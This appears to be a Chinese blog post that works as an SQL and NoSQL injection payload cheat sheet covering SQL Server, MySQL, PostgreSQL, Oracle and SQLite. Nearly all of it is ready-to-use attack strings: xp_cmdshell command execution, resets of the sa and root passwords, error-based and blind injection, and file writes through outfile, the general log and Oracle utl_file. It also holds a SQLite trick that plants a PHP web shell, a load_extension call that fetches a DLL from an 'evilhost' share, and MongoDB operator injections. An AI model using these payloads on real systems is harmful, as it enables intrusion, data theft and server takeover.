2022年04月07日   温氏效应   100 次浏览   暂无评论  

SQL Server Payload

1.1. 常见Payload

Version

SELECT @@version

Comment

SELECT 1 -- comment
SELECT /*comment*/1

Space

0x01 - 0x20

用户信息

SELECT user_name()
SELECT system_user
SELECT user
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

用户权限

select IS_SRVROLEMEMBER('sysadmin')
select IS_SRVROLEMEMBER('db_owner')

List User

SELECT name FROM master..syslogins

数据库信息

SELECT name FROM master..sysdatabases
select concat_ws(table_schema,table_name,column_name) from information_schema.columns
select quotename(name) from master..sysdatabases FOR XML PATH('')

执行命令

EXEC xp_cmdshell 'net user'

Ascii

SELECT char(0x41)
SELECT ascii('A')
SELECT char(65)+char(66) => return AB

Delay

WAITFOR DELAY '0:0:3' pause for 3 seconds

Change Password

ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'

Trick

id=1 union:select password from:user

文件读取

OpenRowset

当前查询语句

select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)

hostname

用于判断是否站库分离

select host_name()
exec xp_getnetname

服务器信息

exec xp_msver

1.2. 注册表读写

xp_regread
    exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'
xp_regwrite
xp_regdeletvalue
xp_regdeletkey
xp_regaddmultistring

1.3. 报错注入

1=convert(int,(db_name()))

1.4. 常用函数

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

1.5. DNS OOB

fn_xe_file_target_read_file
fn_get_audit_file
fn_trace_gettable

1.6. 其他常用存储过程

sp_execute_external_script
sp_makewebtask
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
xp_cmdshell
xp_dirtree
xp_enumerrorlogs
xp_enumgroups
xp_fixeddrives
xp_getfiledetails
xp_loginconfig

MySQL Payload

1.1. 常见Payload

Version

SELECT @@version

Comment

SELECT 1 -- comment
SELECT 1 # comment
SELECT /*comment*/1

Space

0x9 0xa-0xd 0x20 0xa0

Current User

SELECT user()
SELECT system_user()

List User

SELECT user FROM mysql.user

Current Database

SELECT database()

List Database

SELECT schema_name FROM information_schema.schemata

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

If

SELECT if(1=1,'foo','bar'); return 'foo'

Ascii

SELECT char(0x41)
SELECT ascii('A')
SELECT 0x414243 => return ABC

Delay

sleep(1)
SELECT BENCHMARK(1000000,MD5('A'))

Read File

select @@datadir
select load_file('databasename/tablename.MYD')

Blind

ascii(substring(str,pos,length)) & 32 = 1

Error Based

select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))

Change Password

mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"

报错注入常见函数

extractvalue
updatexml
GeometryCollection
linestring
multilinestring
multipoint
multipolygon
polygon
exp

1.2. 写文件

写文件前提

  • root 权限
  • 知晓文件绝对路径
  • 写入的路径存在写入权限
  • secure_file_priv允许向对应位置写入select count(file_priv) from mysql.user

基于 into 写文件

union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'

dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏

基于 log 写文件

show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '<?php var_dump("test");?>';
set global general_log_file = '/original/path';
set global general_log = off;

PostgresSQL Payload

Version

SELECT version()

Comment

SELECT 1 -- comment
SELECT /*comment*/1

Current User

SELECT user
SELECT current_user
SELECT session_user
SELECT getpgusername()

List User

SELECT usename FROM pg_user

Current Database

SELECT current_database()

List Database

SELECT datname FROM pg_database

Ascii

SELECT char(0x41)
SELECT ascii('A')

Delay

pg_sleep(1)

Oracle Payload

常见Payload

dump

select * from v$tablespace;
select * from user_tables;
select column_name from user_tab_columns where table_name = 'table_name';
select column_name, data_type from user_tab_columns where table_name = 'table_name';
SELECT * FROM ALL_TABLES

Comment

--
/**/

Space

0x00 0x09 0xa-0xd 0x20

报错

utl_inaddr.get_host_name
ctxsys.drithsx.sn
ctxsys.CTX_REPORT.TOKEN_TYPE
XMLType
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
ordsys.ord_dicom.getmappingxpath
utl_inaddr.get_host_name
utl_inaddr.get_host_address

OOB

utl_http.request
utl_inaddr.get_host_address
SYS.DBMS_LDAP.INIT
HTTPURITYPE
HTTP_URITYPE.GETCLOB

绕过

rawtohex

写文件

create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
isto_file utl_file.file_type;
begin
isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
utl_file.put_line(isto_file, '<% out.println("test"); %>');
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;

SQLite3 Payload

Comment

--
/**/

Version

select sqlite_version();

Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--

Load_extension

UNION SELECT 1,load_extension('\\evilhost\evil.dll','E');--

NoSQL Payload

常见Payload

绕过限制条件

{"username": "user"} => {"username": {"ne": "fakeuser"}}
{"$where": "return true"}

测试用字符

'"\/$[].>

布尔测试常用

{"$ne": -1}
{"$in": []}
{"$where": "return true"}
{"$or": [{},{"foo":"1"}]}

时间

{"$where": "sleep(100)"}

共有 0 条评论

发表评论